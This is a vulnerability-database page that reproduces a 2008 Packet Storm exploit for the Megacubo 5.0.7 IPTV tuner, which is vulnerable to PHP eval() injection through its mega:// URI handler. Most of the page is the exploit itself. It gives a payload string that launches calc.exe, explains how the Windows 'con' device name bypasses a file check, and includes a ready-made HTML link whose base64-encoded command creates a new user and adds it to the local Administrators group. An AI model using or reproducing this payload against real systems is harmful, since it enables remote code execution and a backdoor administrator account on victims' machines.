Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Megacubo 5.0.7 Injection Exploit

🗓️ 31 Dec 2008 00:00:00Reported by Nine:Situations:GroupType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 21 Views

Megacubo 5.0.7 remote eval injection exploit against Internet Explorer

Code
`<!--  
Megacubo 5.0.7 (mega://) remote eval() injection exploit  
by Nine:Situations:Group::pyrokinesis  
site: http://retrogod.altervista.org/  
  
tested against Internet Explorer 8 beta 2/xp sp 3  
  
software site: http://www.megacubo.net/tv/  
download url: http://sourceforge.net/project/showfiles.php?group_id=231636&package_id=280849&release_id=608023  
  
description:  
"Megacubo is a IPTV tuner application written in PHP + Winbinder.  
It has a catalogue of links of TV streams which are available  
for free in the web. At the moment it only runs on Windows(2000,  
XP and Vista)."  
(note that it is among most downloaded apps on sourceforge, http://sourceforge.net/softwaremap/trove_list.php?form_cat=99)  
  
explaination:  
it's possible to pass arbitrary php code to the "play" command  
of "mega://" uri handler which is further copied to the  
c:\DATASTORE.txt temporary file and evaluated, note the "con"  
argument (which is a windows device name) to bypass a file_exists()  
check  
  
example exploit, this run calc.exe:  
  
mega://play|con.."a()".system(base64_decode('Y21kIC9jIHN0YXJ0IGNhbGM='))."/?");print(  
  
the following one execute:  
cmd /c NET USER pyrokinesis pass /ADD && NET LOCALGROUP Administrators /ADD pyrokinesis  
-->  
  
<a href='mega://play|con.."a()".system(base64_decode(Y21kIC9jIE5FVCBVU0VSIHB5cm9raW5lc2lzIHBhc3MgL0FERCAmJiBORVQgTE9DQUxHUk9VUCBBZG1pbmlzdHJhdG9ycyAvQUREIHB5cm9raW5lc2lz))."/?");print('>pwn</a>  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Dec 2008 00:00Current
7.4High risk
Vulners AI Score7.4
megacubo 5.0.7remote exploitinternet explorer 8winbinderphpiptv tunerarbitrary code executionbase64 decodewindows device name bypass
21